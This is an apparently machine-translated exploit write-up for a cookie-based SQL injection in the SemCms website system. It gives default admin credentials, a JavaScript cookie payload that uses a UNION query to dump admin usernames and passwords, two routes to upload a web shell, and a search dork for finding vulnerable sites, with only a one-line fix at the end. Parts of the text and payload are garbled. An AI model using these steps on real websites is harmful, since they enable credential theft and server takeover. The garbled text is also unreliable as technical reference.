SemCms Foreign Trade website management system cookie injection vulnerability and repair

By Mr. DzY from www.0855. TV
It seems that someone has discovered the background cookie spoofing vulnerability, but it seems that the official website has been fixed.
Nothing left to worry about. After reading it, we found that no cookie submitted data is filtered and cookie injection is supported.

SemCms is an open source foreign trade enterprise website management system, mainly used for foreign trade enterprises, compatible with mainstream browsers such as IE, Firefox, Chrome, Safari, and Opera. SemCms is written in vbscript language and runs in combination with iis.

Default background: clkj_admin/

Default Account/password: 1 (many sites have not changed .. Khan !!)

Vulnerability line:
Only the data submitted by get and post is filtered, and cookie injection is not performed on the data submitted by cookie.

EXP:
Javascript: alert (document. cookie = "pid =" + escape ("332 and 1 = 2 union select, 5, clkj_admin, clkj_password, 16,17 from clkj_admin "));

Test:
Asp? Pid = 322 "> www.2cto.com/new/en/P_view.asp? Pid = 1, 322

Possible exploitation methods:
1. You can customize the image name in the uploaded image, and enter Mr. DzY. asp; 1 in the custom name (provided that IIS6.0 is used ).
2. on the right of the management background, choose inquiry management> data backup> password (management password)> shell backup.

Keywords:
Inurl: P_view.asp? Pid =

Solution: filter the submitted cookie data and specify the method for obtaining the request object.